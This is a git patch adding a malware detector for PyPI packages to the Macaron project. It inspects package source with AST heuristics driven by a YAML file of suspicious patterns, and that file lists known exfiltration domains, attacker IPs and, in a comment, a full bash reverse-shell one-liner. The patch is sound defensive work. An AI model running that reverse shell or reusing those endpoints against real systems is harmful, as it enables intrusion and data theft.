From f2998f5789862dcb53cdb738d276b25ba8107305 Mon Sep 17 00:00:00 2001 From: Yao-Wen Chang Date: Fri, 30 Aug 2024 00:40:01 +0800 Subject: [PATCH] chore: implement method to validate suspicious packages for malicious behavior --- .../pypi_heuristics/pypi_source_extractor.py | 478 ++++++++++++++++++ .../pypi_heuristics/suspicious_pattern.yaml | 88 ++++ .../checks/detect_malicious_metadata_check.py | 80 ++- .../package_registry/pypi_registry.py | 90 ++++ 4 files changed, 714 insertions(+), 22 deletions(-) create mode 100644 src/macaron/malware_analyzer/pypi_heuristics/pypi_source_extractor.py create mode 100644 src/macaron/malware_analyzer/pypi_heuristics/suspicious_pattern.yaml diff --git a/src/macaron/malware_analyzer/pypi_heuristics/pypi_source_extractor.py b/src/macaron/malware_analyzer/pypi_heuristics/pypi_source_extractor.py new file mode 100644 index 000000000..bfa5f3a25 --- /dev/null +++ b/src/macaron/malware_analyzer/pypi_heuristics/pypi_source_extractor.py @@ -0,0 +1,478 @@ +# Copyright (c) 2024 - 2024, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +""" +Detect suspicious function calls in the code and trace the arguments back to their original values. + +This allows for deeper analysis of potentially malicious behavior. +""" + +import ast +import logging +import os +import pathlib +import re + +import yaml + +from macaron.json_tools import JsonType +from macaron.slsa_analyzer.package_registry.pypi_registry import PyPIPackageJsonAsset + +logger: logging.Logger = logging.getLogger(__name__) + + +class PyPISuspiciousContentExtractor: + """This class is used to extract the suspicious content from the source code.""" + + def __init__(self, pypi_package_json: PyPIPackageJsonAsset) -> None: + """Collect required data for analysing the source code.""" + self.source_code: dict[str, str] | None = pypi_package_json.get_sourcecode() + self.suspicious_pattern: dict[str, JsonType] | None = self._load_suspicious_pattern() + self.extracted_suspicious_content: dict[str, JsonType] = {} + + def extract_susupicious_content(self) -> None: + """Extract the suspicious content from the source code.""" + if not self.source_code or not self.suspicious_pattern: + return + self.extracted_suspicious_content = self._extract_suspicious_content_from_source() + + def _load_suspicious_pattern(self) -> dict[str, JsonType] | None: + """Load the suspicious pattern from suspicious_pattern.yaml. + + Returns + ------- + dict[str, JsonType] | None + The suspicious pattern. + """ + filename: str = "suspicious_pattern.yaml" + curr_dir: pathlib.Path = pathlib.Path(__file__).parent.absolute() + suspicious_pattern_file: str = os.path.join(curr_dir, filename) + with open(suspicious_pattern_file, encoding="utf-8") as file: + try: + suspicious_pattern: dict[str, JsonType] = yaml.safe_load(file) + except yaml.YAMLError as yaml_exception: + logger.debug("Error parsing the yaml file: '%s'", yaml_exception) + return None + return suspicious_pattern + + def _extract_suspicious_content_from_source(self) -> dict[str, JsonType]: + """ + Extract the suspicious content from the source code. + + Returns + ------- + dict[str, JsonType] | None + The suspicious behaviours within the source code. + """ + logger.debug("Extracting required data for source code analysis") + extracted_content: dict[str, JsonType] = {} + if self.source_code and self.suspicious_pattern: + for filename, content in self.source_code.items(): + try: + imports = self._extract_imports_from_ast(content) + except SyntaxError: + imports = self._extract_imports_from_lines(content) + + if isinstance(self.suspicious_pattern["imports"], list): + target_imports: set[str] | None = imports & set(self.suspicious_pattern["imports"]) + else: + target_imports = None + + # Found suspicious import in the source code + if not target_imports: + continue + analyzed_results: dict | None = analyze_content(content, self.suspicious_pattern) + if not analyzed_results: + continue + extracted_content[filename] = analyzed_results + + # TODO: implement this as another heuristic or as malware validation + # if filename == "setup.py": + # Catch the install_requires packages + # TODO: Implement other suspicious setup in suspicious_pattern.yaml + # pattern = r"install_requires\s*=\s*\[(.*?)\]" + # matches: re.Match | None = re.search(pattern, content, re.DOTALL) + # if matches: + # install_requires: set[str] | None = set(re.findall(r"'(.*?)'", matches.group(1))) + # if ( + # install_requires + # and install_requires & set(self.suspicious_pattern["imports"]) + # and len(install_requires) < 4 + # # This threshold is based on historical malwares + # ): + # extracted_data["install_requires"] = install_requires + return extracted_content + + @property + def extracted_content(self) -> dict[str, JsonType]: + """Get the required data from the extracted source code. + + Returns + ------- + JsonType + The data required for analysis + """ + return self.extracted_suspicious_content + + def _extract_imports_from_ast(self, content: str) -> set[str]: + """Extract imports from source code using the parsed AST. + + Parameters + ---------- + source_content: str + The source code as a string. + + Returns + ------- + set[str] + The set of imports. + + Raises + ------ + SyntaxError + If the code could not be parsed. + """ + imports = set() + tree = ast.parse(content) + for node in ast.walk(tree): + if isinstance(node, ast.Import): + for alias in node.names: + imports.add(alias.name) + elif isinstance(node, ast.ImportFrom): + module = node.module + if module: + _module = "." * node.level + module + imports.add(_module) + for name in node.names: + imports.add(_module + "." + name.name) + + return imports + + def _extract_imports_from_lines(self, content: str) -> set[str]: + """Extract imports from source code using per line pattern matching. + + Parameters + ---------- + source_content: str + The source code as a string. + + Returns + ------- + set[str] + The list of imports. + """ + alias_pattern = r"\s+as\s+\w+(?:\.{0,1}\w+)*" + # Pattern for module aliases. + + module_name = r"\w+(?:\.{0,1}\w+" + # as described under pattern_import. + + pattern_import = ( + r"(?:import\s+)(" + module_name + r")*(?:" + alias_pattern + r")?" + r"(?:(?:\s*,\s*)(?:" + module_name + r")*(?:" + alias_pattern + r")?))*)(?:(?:\s|#).*)?" + ) + # Allows for a standard import statement. + # E.g.: import + # Where consists of one or more . + # Where consists of one or more words (a-z or 0-9 or underscore) separated by periods, + # with an optional alias. + # Where allows any character(s) either after a single space or a hash (#). + + pattern_from_import = ( + r"(?:from\s+)([.]*" + + module_name + + r")*)(?:\s+import\s+(\w+(?:\s+as\s+\w+)?(?:(?:\s*,\s*)(?:\w+(?:\s+as\s+\w+)?))*))" + ) + # Allows for a from import statement. + # E.g.: from import + # Where is as above, but can also be preceded by any number of periods. + # (Note only a single module can be placed here.) + # Where consists of one or more with optional aliases. + # Where is identical to except without any periods. + # Where requires at least one space followed by one or more word characters, plus + # any other characters following on from that. + + combined_pattern = f"^(?:{pattern_import})|(?:{pattern_from_import})$" + # The combined pattern creates two match groups: + # 1 - standard import statement. + # 2 - from import statement module. + # 3 - from import statement module components. + + imports = set() + for line in content.splitlines(): + line.strip() + match = re.match(combined_pattern, line) + if not match: + continue + + if match.group(1): + # Standard import, handle commas and aliases if present. + splits = self._prune_aliased_lines(match.group(1), alias_pattern) + for split in splits: + imports.add(split) + elif match.group(2): + # From import + imports.add(match.group(2)) + if match.group(3): + splits = self._prune_aliased_lines(match.group(3), alias_pattern) + for split in splits: + imports.add(match.group(2) + "." + split) + + return imports + + def _prune_aliased_lines(self, text: str, alias_pattern: str) -> list[str]: + """Split the line on commas and remove any aliases from individual parts.""" + results = [] + splits = text.split(",") + for split in splits: + split = split.strip() + results.append(re.sub(alias_pattern, "", split)) + return results + + +class FunctionCallAnalyzer(ast.NodeVisitor): + """The class is used to extract the function call from the tree nodes.""" + + def __init__(self, suspicious_pattern: dict) -> None: + """Initialize the analyzer. + + Parameters + ---------- + suspicious_pattern: dict + The suspicious behaviour. + + """ + self.suspicious_patterns: dict = suspicious_pattern + self.results: dict = { + "OS Detection": {}, + "Code Execution": {}, + "Information Collecting": {}, + "Remote Connection": {}, + "Custom Setup": {}, + "Suspicious Constant": {}, + "Obfuscation": {}, + } + # self.assignments: dict = {} # Store the assignment for dataflow analysis + + @property + def analyzed_results(self) -> dict: + """Access to the results collected during the analysis process. + + Returns + ------- + dict + A dictionary that contains the issues found in the source code, + with their line number and corresponding code snippet. + """ + return self.results + + def visit_Module(self, node: ast.Module) -> None: # noqa: N802 # pylint: disable=C0103 + """Visit all root node.""" + self.generic_visit(node) + + def visit_If(self, node: ast.If) -> None: # noqa: N802 # pylint: disable=C0103 + """Visit the If node.""" + if isinstance(node.test, ast.Compare): + payload = self.extract_nested_tree(node.test.comparators[0]) + if payload == "nt": + self.results["OS Detection"][node.lineno] = payload + + self.generic_visit(node) + + def visit_Call(self, node: ast.Call) -> None: # noqa: N802 # pylint: disable=C0103 + """Visit the Call node.""" + if node.lineno not in self.results: # There might be multiple ast.Call in one line + func = self.extract_nested_tree(node.func) + suspicious_calls: dict = self.suspicious_patterns["ast_calls"] + if func: + if func in suspicious_calls["code_execution"]: + self.collect_results(node, "Code Execution", func) + elif func in suspicious_calls["info_collecting"]: + self.collect_results(node, "Information Collecting", func) + elif func in suspicious_calls["remote_connection"]: + self.collect_results(node, "Remote Connection", func) + elif func in suspicious_calls["obfuscation"]: + self.collect_results(node, "Obfuscation", func) + + self.generic_visit(node) + + # def visit_Assign(self, node: ast.Assign) -> None: + # if node.targets: + # var_name = node.targets[0].id + # node + # + # # Handle constant assignments + # if isinstance(node.value, ast.Constant): + # var_value = node.value.value + # self.assignments[var_name] = var_value + # + # # Handle variable-to-variable assignments + # elif isinstance(node.value, ast.Name): + # ref_name = node.value.id + # self.assignments[var_name] = ref_name + # + # self.generic_visit(node) + + def visit_ClassDef(self, node: ast.ClassDef) -> None: # noqa: N802 # pylint: disable=C0103 + """Visit the ClassDef node.""" + if not node.bases: + return + + for base in node.bases: + if isinstance(base, ast.Name): + if base.id == "install": + self.results["Custom Setup"][node.lineno] = node.name + self.generic_visit(node) + + def visit_Constant(self, node: ast.Constant) -> None: # noqa: N802 # pylint: disable=C0103 + """Visit the Constant node.""" + if not isinstance(node.value, str): + return + suspicious_constants: dict = self.suspicious_patterns["ast_constant"] + for constants in suspicious_constants.values(): + if self._has_suspicious_constant(constants, node.value): + self._add_suspicious_constant(node.lineno, node.value) + break + + def _has_suspicious_constant(self, constants: list, value: str) -> bool: + """Check if the Constant contains the suspicious string. + + Parameters + ---------- + constants: list + The suspicious constants in the suspicious pattern. + value: str + The target constant within the source code. + + Returns + ------- + bool + Returns True if suspicious behavior is detected; otherwise, False. + """ + return any(constant in value for constant in constants) + + def _add_suspicious_constant(self, lineno: int, value: str) -> None: + """Add the suspicious constant into the results dictionary. + + The list in one line might contain multiple suspicious constants. + + Parameters + ---------- + lineno: int + The line is currently analyzed. + value: str + The suspicious constant. + """ + if lineno not in self.results["Suspicious Constant"]: + self.results["Suspicious Constant"][lineno] = [value] + else: + self.results["Suspicious Constant"][lineno].append(value) + + def extract_nested_tree(self, node: ast.expr) -> str | None: + """Extract the subtree from current node and combine them to original source code through recursive method. + + Parameters + ---------- + node: ast.Constant | ast.Name | ast.Call | ast.Attribute + The node is currently visited. + + Returns + ------- + str | None + The source code snippet. + """ + if isinstance(node, ast.Constant): + return str(node.value) + if isinstance(node, ast.Name): + return node.id + if isinstance(node, ast.Call): + func = self.extract_nested_tree(node.func) + args: list = node.args + if args: + res = self.extract_nested_tree(args[0]) + if res is None: + res = "" + return f"{func}({res})" + if isinstance(node, ast.Attribute): + attr = node.attr + res = self.extract_nested_tree(node.value) + return f"{res}.{attr}" + return None + + def collect_results(self, node: ast.Call, category: str, func: str) -> None: + """Categorized the suspicious code snippet in to the results dictionary. + + The function only deals with the issues related to suspicious function call. + + Parameters + ---------- + node: ast.Call + The Call node. + category: str + The issue type. + func: str + The function call. + """ + ast_args: list = node.args + args: list[str] = [] + for ast_arg in ast_args: + arg = self.extract_nested_tree(ast_arg) if ast_arg else "" + if arg: + args.append(arg) + res = ", ".join(args) + self.results[category][node.lineno] = f"{func}({res})" + + # Support decryption in the future + # The required library for decryption need to be temporily installed during runtime + # def extract_base64_payload(self, node): + # """Handles base64.b64decode() calls and decodes the base64 string.""" + # if node.args: + # + # base64_str = self.extract_nested(node.args[0]) + # if isinstance(base64_str, str): # Base64 encoded data must be a string + # # Try decoding the base64 string + # try: + # decoded_bytes = base64.b64decode(base64_str) + # return decoded_bytes.decode('utf-8') + # except Exception as e: + # return f"Error decoding base64: {e}" + # return 'Non-base64 content or invalid decode' + + # def _find_module_in_node(self, node_module: str) -> str | None: + # """Check whether the module is suspicious.""" + # if isinstance(self.suspicious_pattern["imports"], list) and node_module in self.suspicious_pattern["imports"]: + # return node_module + # return None + + +def analyze_content(content: str, suspicious_pattern: dict[str, JsonType]) -> dict | None: + """ + Parse the source code into an Abstract Syntax Tree (AST) and analyze the nodes for suspicious activity. + + Parameters + ---------- + code : str + The source code of the script to be analyzed. + target_import_modules : set[str] + The set of target modules to discover from the AST nodes. + suspicious_pattern: dict[str, JsonType] + The pattern defined in suspicious_pattern.yaml. + + Returns + ------- + dict | None + The results of the source code analysis. + """ + try: + tree = ast.parse(content) + except SyntaxError as e: + # Handle syntax errors during parsing + logger.error("Syntax error encountered: %s", e) + return None + analyzer = FunctionCallAnalyzer(suspicious_pattern) + analyzer.visit(tree) + res: dict = analyzer.analyzed_results + for value in res.values(): + if value: + return res + return None diff --git a/src/macaron/malware_analyzer/pypi_heuristics/suspicious_pattern.yaml b/src/macaron/malware_analyzer/pypi_heuristics/suspicious_pattern.yaml new file mode 100644 index 000000000..67a64fb13 --- /dev/null +++ b/src/macaron/malware_analyzer/pypi_heuristics/suspicious_pattern.yaml @@ -0,0 +1,88 @@ +# Copyright (c) 2024 - 2024, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + + +#This file defines the malicious pattern. +#The pattern is collected from the malware repository of Pypi.org. + +imports: +- requests +- base64 +- Fernet +- telebot +- platform +- ClientSession +- socket +- os +- getpass +- telegram +- __pyarmor__ +- urllib.request.urlopen + +ast_calls: + os_detection: + - os.name + code_execution: + - exec + - subprocess.run + - subprocess.call + - subprocess.Popen + info_collecting: + - os.getcwd + - os.getlogin + - os.getenv + - getpass.getuser + - socket.gethostname + - platform.node + obfuscation: + - base64.b64decode + - __pyarmor__ + # - Fernet.decrypt + remote_connection: + - requests.get + - requests.post + - telegram.send_document + - urllib.request.urlopen + custom_setup: + - install + reverse_shell: + - os.dup2 + +ast_constant: + domains: + - webhook.site + - discord + - cdn.discordapp.com + - nkmlpvguyjigksybkgmsvvsjuvsuqnnti.oast.fun + - api.telegram.org + - diddlydingusdu.de # builderknower2 + - eozjyg0uj1pesea.m.pipedream.net # business-kpi-manager + - 2.tcp.ngrok.io + - files.pypihosted.org + - filebin.net + - akinasouls.fr + - api.ipify.org # Get public IP of the victim + - httpbin.or + - g5mr93si9nwr0vblbcuk1fp4cvim6du2.oastify.com + - 29c2aa2421c8.ngrok.ap + ip: + - 8.217.153.123 + - 46.29.237.14 + local_path: + - /storage/emulated/0/ # Android: primary user account on the device + # DNS + - /etc/resolv.conf + - /run/systemd/resolve/stub-resolv.conf + executable: + - .exe + windows: + - APPDATA + +# setup: +# - cmdclass # Replace the pip command, for example `install` +# - install_requires +# - setup_requires # Deprecation +# +# +# reverse_shell: +# - bash -c "bash -i >& /dev/tcp/81.46.246.181/4444 0>&1" diff --git a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py index 7e387b52d..c4a5b7674 100644 --- a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py +++ b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py @@ -19,7 +19,9 @@ from macaron.malware_analyzer.pypi_heuristics.metadata.one_release import OneReleaseAnalyzer from macaron.malware_analyzer.pypi_heuristics.metadata.unchanged_release import UnchangedReleaseAnalyzer from macaron.malware_analyzer.pypi_heuristics.metadata.unreachable_project_links import UnreachableProjectLinksAnalyzer -from macaron.malware_analyzer.pypi_heuristics.sourcecode.suspicious_setup import SuspiciousSetupAnalyzer +from macaron.malware_analyzer.pypi_heuristics.pypi_source_extractor import PyPISuspiciousContentExtractor + +# from macaron.malware_analyzer.pypi_heuristics.sourcecode.suspicious_setup import SuspiciousSetupAnalyzer from macaron.slsa_analyzer.analyze_context import AnalyzeContext from macaron.slsa_analyzer.build_tool.pip import Pip from macaron.slsa_analyzer.build_tool.poetry import Poetry @@ -62,11 +64,12 @@ class MaliciousMetadataFacts(CheckFacts): HighReleaseFrequencyAnalyzer, UnchangedReleaseAnalyzer, CloserReleaseJoinDateAnalyzer, - SuspiciousSetupAnalyzer, + # SuspiciousSetupAnalyzer, ] + # The HeuristicResult sequence is aligned with the sequence of ANALYZERS list -SUSPICIOUS_COMBO: dict[ +SUSPICIOUS_COMBO: tuple[ tuple[ HeuristicResult, HeuristicResult, @@ -74,10 +77,10 @@ class MaliciousMetadataFacts(CheckFacts): HeuristicResult, HeuristicResult, HeuristicResult, - HeuristicResult, + # HeuristicResult, ], - float, -] = { + ..., +] = ( ( HeuristicResult.FAIL, # Empty Project HeuristicResult.SKIP, # Unreachable Project Links @@ -85,11 +88,11 @@ class MaliciousMetadataFacts(CheckFacts): HeuristicResult.SKIP, # High Release Frequency HeuristicResult.SKIP, # Unchanged Release HeuristicResult.FAIL, # Closer Release Join Date - HeuristicResult.FAIL, # Suspicious Setup + # HeuristicResult.FAIL, # Suspicious Setup # No project link, only one release, and the maintainer released it shortly # after account registration. # The setup.py file contains suspicious imports. - ): Confidence.HIGH, + ), ( HeuristicResult.FAIL, # Empty Project HeuristicResult.SKIP, # Unreachable Project Links @@ -97,11 +100,11 @@ class MaliciousMetadataFacts(CheckFacts): HeuristicResult.FAIL, # High Release Frequency HeuristicResult.FAIL, # Unchanged Release HeuristicResult.FAIL, # Closer Release Join Date - HeuristicResult.FAIL, # Suspicious Setup + # HeuristicResult.FAIL, # Suspicious Setup # No project link, frequent releases of multiple versions without modifying the content, # and the maintainer released it shortly after account registration. # The setup.py file contains suspicious imports. - ): Confidence.HIGH, + ), ( HeuristicResult.FAIL, # Empty Project HeuristicResult.SKIP, # Unreachable Project Links @@ -109,11 +112,11 @@ class MaliciousMetadataFacts(CheckFacts): HeuristicResult.FAIL, # High Release Frequency HeuristicResult.PASS, # Unchanged Release HeuristicResult.FAIL, # Closer Release Join Date - HeuristicResult.FAIL, # Suspicious Setup + # HeuristicResult.FAIL, # Suspicious Setup # No project link, frequent releases of multiple versions, # and the maintainer released it shortly after account registration. # The setup.py file contains suspicious imports. - ): Confidence.HIGH, + ), ( HeuristicResult.FAIL, # Empty Project HeuristicResult.SKIP, # Unreachable Project Links @@ -121,10 +124,10 @@ class MaliciousMetadataFacts(CheckFacts): HeuristicResult.FAIL, # High Release Frequency HeuristicResult.FAIL, # Unchanged Release HeuristicResult.FAIL, # Closer Release Join Date - HeuristicResult.PASS, # Suspicious Setup + # HeuristicResult.PASS, # Suspicious Setup # No project link, frequent releases of multiple versions without modifying the content, # and the maintainer released it shortly after account registration. - ): Confidence.MEDIUM, + ), ( HeuristicResult.PASS, # Empty Project HeuristicResult.FAIL, # Unreachable Project Links @@ -132,12 +135,12 @@ class MaliciousMetadataFacts(CheckFacts): HeuristicResult.FAIL, # High Release Frequency HeuristicResult.PASS, # Unchanged Release HeuristicResult.FAIL, # Closer Release Join Date - HeuristicResult.FAIL, # Suspicious Setup + # HeuristicResult.FAIL, # Suspicious Setup # All project links are unreachable, frequent releases of multiple versions, # and the maintainer released it shortly after account registration. # The setup.py file contains suspicious imports. - ): Confidence.HIGH, -} + ), +) class DetectMaliciousMetadataCheck(BaseCheck): @@ -176,6 +179,29 @@ def _should_skip( return True return False + def validate_malware(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[bool, dict[str, JsonType] | None]: + """Validate the package is malicious. + + Parameters + ---------- + pypi_package_json: PyPIPackageJsonAsset + + Returns + ------- + tuple[bool, dict[str, JsonType] | None] + Returns True if the source code includes suspicious pattern. + Returns the result of the validation including the line number + and the suspicious arguments. + e.g. requests.get("http://malicious.com") + return the "http://malicious.com" + """ + extractor = PyPISuspiciousContentExtractor(pypi_package_json) + extractor.extract_susupicious_content() + content: dict[str, JsonType] | None = extractor.extracted_content + if content: + return True, content + return False, None + def run_heuristics( self, pypi_package_json: PyPIPackageJsonAsset ) -> tuple[dict[Heuristics, HeuristicResult], dict[str, JsonType]]: @@ -193,9 +219,11 @@ def run_heuristics( """ results: dict[Heuristics, HeuristicResult] = {} detail_info: dict[str, JsonType] = {} + for _analyzer in ANALYZERS: analyzer: BaseHeuristicAnalyzer = _analyzer() logger.debug("Instantiating %s", _analyzer.__name__) + depends_on: list[tuple[Heuristics, HeuristicResult]] | None = analyzer.depends_on if depends_on: @@ -208,6 +236,7 @@ def run_heuristics( if analyzer.heuristic: results[analyzer.heuristic] = result detail_info.update(result_info) + return results, detail_info def run_check(self, ctx: AnalyzeContext) -> CheckResultData: @@ -243,11 +272,18 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: if pypi_package_json.download(dest=""): result, detail_info = self.run_heuristics(pypi_package_json) result_combo: tuple = tuple(result.values()) - confidence: float | None = SUSPICIOUS_COMBO.get(result_combo, None) - result_type = CheckResultType.FAILED - if confidence is None: - confidence = Confidence.HIGH - result_type = CheckResultType.PASSED + confidence: Confidence = Confidence.HIGH + result_type: CheckResultType = CheckResultType.PASSED + + if result_combo in SUSPICIOUS_COMBO: + is_malware, validation_result = self.validate_malware(pypi_package_json) + if is_malware: # Find source code block matched the malicious pattern + confidence = Confidence.HIGH + result_type = CheckResultType.FAILED + logger.debug(validation_result) + elif validation_result: # Find suspicious source code, but cannot be confirmed + confidence = Confidence.MEDIUM + result_type = CheckResultType.FAILED result_tables.append( MaliciousMetadataFacts( diff --git a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py index dd52e6394..496366322 100644 --- a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py +++ b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py @@ -5,12 +5,16 @@ import logging import os +import tarfile +import tempfile import urllib.parse +import zipfile from dataclasses import dataclass from datetime import datetime import requests from bs4 import BeautifulSoup, Tag +from requests import RequestException from macaron.config.defaults import defaults from macaron.database.table_definitions import Component @@ -165,6 +169,78 @@ def download_package_json(self, url: str) -> dict: return res_obj + def fetch_sourcecode(self, src_url: str) -> dict[str, str] | None: + """Get the source code of the package. + + Returns + ------- + str | None + The source code. + """ + # Get name of file. + _, _, file_name = src_url.rpartition("/") + + # Create a temporary directory to store the downloaded source. + with tempfile.TemporaryDirectory() as temp_dir: + try: + response = requests.get(src_url, stream=True, timeout=40) + response.raise_for_status() + except requests.exceptions.HTTPError as http_err: + logger.debug("HTTP error occurred: %s", http_err) + return None + + if response.status_code != 200: + return None + + source_file = os.path.join(temp_dir, file_name) + with open(source_file, "wb") as file: + try: + for chunk in response.iter_content(): + file.write(chunk) + except RequestException as error: + # Something went wrong with the request, abort. + logger.debug("Error while streaming source file: %s", error) + response.close() + return None + logger.debug("Begin fetching the source code from PyPI") + py_files_content: dict[str, str] = {} + if tarfile.is_tarfile(source_file): + try: + with tarfile.open(source_file, "r:gz") as tar: + for member in tar.getmembers(): + if member.isfile() and member.name.endswith(".py") and member.size > 0: + file_obj = tar.extractfile(member) + if file_obj: + content = file_obj.read().decode("utf-8") + py_files_content[member.name] = content + except tarfile.ReadError as exception: + logger.debug("Error reading tar file: %s", exception) + return None + elif zipfile.is_zipfile(source_file): + try: + with zipfile.ZipFile(source_file, "r") as zip_ref: + for info in zip_ref.infolist(): + if info.filename.endswith(".py") and not info.is_dir() and info.file_size > 0: + with zip_ref.open(info) as file_obj: + content = file_obj.read().decode("utf-8") + py_files_content[info.filename] = content + except zipfile.BadZipFile as bad_zip_exception: + logger.debug("Error reading zip file: %s", bad_zip_exception) + return None + except zipfile.LargeZipFile as large_zip_exception: + logger.debug("Zip file too large to read: %s", large_zip_exception) + return None + # except KeyError as zip_key_exception: + # logger.debug( + # "Error finding target '%s' in zip file '%s': %s", archive_target, source_file, zip_key_exception + # ) + # return None + else: + logger.debug("Unable to extract file: %s", file_name) + + logger.debug("Successfully fetch the source code from PyPI") + return py_files_content + def get_package_page(self, package_name: str) -> str | None: """Implement custom API to get package main page. @@ -411,3 +487,17 @@ def get_latest_release_upload_time(self) -> str | None: upload_time: str | None = urls[0].get("upload_time") return upload_time return None + + def get_sourcecode(self) -> dict[str, str] | None: + """Get source code of the package. + + Returns + ------- + dict[str, str] | None + The source code of each script in the package + """ + url: str | None = self.get_sourcecode_url() + if url: + source_code: dict[str, str] | None = self.pypi_registry.fetch_sourcecode(url) + return source_code + return None